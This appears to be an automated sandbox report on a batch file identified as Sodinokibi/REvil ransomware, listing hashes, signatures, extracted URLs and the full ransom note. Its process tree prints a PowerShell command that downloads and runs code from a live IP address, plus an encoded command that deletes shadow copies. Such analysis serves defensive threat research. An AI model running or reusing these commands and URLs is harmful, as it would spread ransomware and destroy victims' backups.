Analysis

  • max time kernel
    122s
  • max time network
    63s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    02-06-2020 10:10

General

  • Target

    6d8087f6ec720945a32c8ee912884724.bat

  • Size

    222B

  • MD5

    f215a676b7ae355bb7b7d9288ef0cac1

  • SHA1

    86d732a573f84185b33555e496bcf0b86316f4ac

  • SHA256

    47ec07c77cf326da4daa229be123e052dd6dd66171a3b6fb323dce3240b7c7a8

  • SHA512

    ec06287d161ea1fe6a44d215a0975a9a3b4570b2c3054e26041bfd6b31e29ef3e73652665a5d91f76cffdcc2b7972381028ac2c7be22a2437300624ea0d42438

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724

Extracted

Path

C:\s9859-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension s9859. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/73?s=199985d5e2c36e7529c8b03570010db7 [+] [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B062B4B7ADC0CAC7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B062B4B7ADC0CAC7 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: l7OYtghel1EQDRx0cMOMkcCevOhRlz69ZSsYxYn53p4c1YmlJG/lvbzX7s69RxVD kP+KgembpCA9xnwbyMJj3ykyHMi8CGP1yZ6rhzqIlO7Trndhm+wlf//aO4qG+gxx kH62Aq7hGO1ED0ILNPeQdWka8Dh1Am/Ui0cBX6Vm5r+afOfxRlxYBL4IhPDDoTvG IQUMicdcCdbcBkB3+kIbcTmukLSwzJ0RcpOLKkuNXTx0i4jBsKXl/4xBhZUUBq+A pwVldJyYzL0WA2X2zwPNfGD0XDC6z2bap7zvkxUeueWcUhUkebHgHcpXihf8taHI Dk1wx9B7WzUmtTvXYnphGkjD0BJ5ngPAHMxnSCiBNjzvpFgg//Jh5nE6ppt7jrdB 6HQbUXrw6jFyIigvd8Dir8f7V8gQ3JGPIsnPp2wS0SbKywlKsoUDn3vLwYa3pFgj 4vgulVKCWsLhSTj1NFLoiKKueD7tL/qQgudaNERbJXVLNb0NCvgqytpolITtlD4p xYaT7XusLFts3T/7uDUnF++7Q3hvygnhUlcyXacTzfQoSt1xIXihgP5oCHgky+Bb Fo92O0IXEc2DCTLpnIwZiS5W1o8tZvFXW5SuTea7czH9l4Uozc0CGG76lJSMwEJL 0Rla8Otz9nTa7UClUXWp+MHBQYNRX9tZUQJhsDy5QEPvJd3VASxrYobATmAGhiOQ m1/np4gNoGjWCnKBt8GOUgUTyvjE5SAaXY0jY6Ly/tD8nBE1Y9ycKPadL6R7uzSS Z6mH0inFM+evZfUrC1neYFVMihhcKrPg8dpYS9GtTBugPJdIR/UZf/gHSgelCb4w gq7SrG3kpvEAXNGiHK45rI/WMY04i2P0J8kHYtGz4buC9ULc0OIlFDHGof9czcvd cujxcGEFimf612+AwdLYgnALq3qCGRpcSzgLZVNWYKDCiCj7HcF4RgTjy9BwaFwi NbdsgW1tM9nYvQp8k1gD1lSsSzvJzMe2r/QKtXlGQDAEXu1l8L0+Bqf7LnL5X//d fto6RozigOUYYgaQZXqXH6emplT/Q38ARImKU3U8osBPsW5vHurnCATN6BmF96cZ wU6tjFZ2OGfwPwuL234WZvekdkJb2z8CWI8N0jJfr6yKSHoDumSIMtAAeZ/GJYU/ 1F/e1jL3w3+j7rdlIQUApajsgiFBrT15Q3X5eIXJStqm6yNFfeonls+GtIvSN+vp jPKCtHaykv9I/cqfOsCiRcfs+kxDaTUe5vtqYnky0razn8i7OnrH6UdaenSCRiSc CIxQJoAS0L/RflsRRjT7czWv/JKxgp+RehiEcvAW ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B062B4B7ADC0CAC7

http://decryptor.cc/B062B4B7ADC0CAC7

Signatures

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\6d8087f6ec720945a32c8ee912884724.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724');Invoke-DHFGQQVRIHKXEIL;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:756
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1640

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms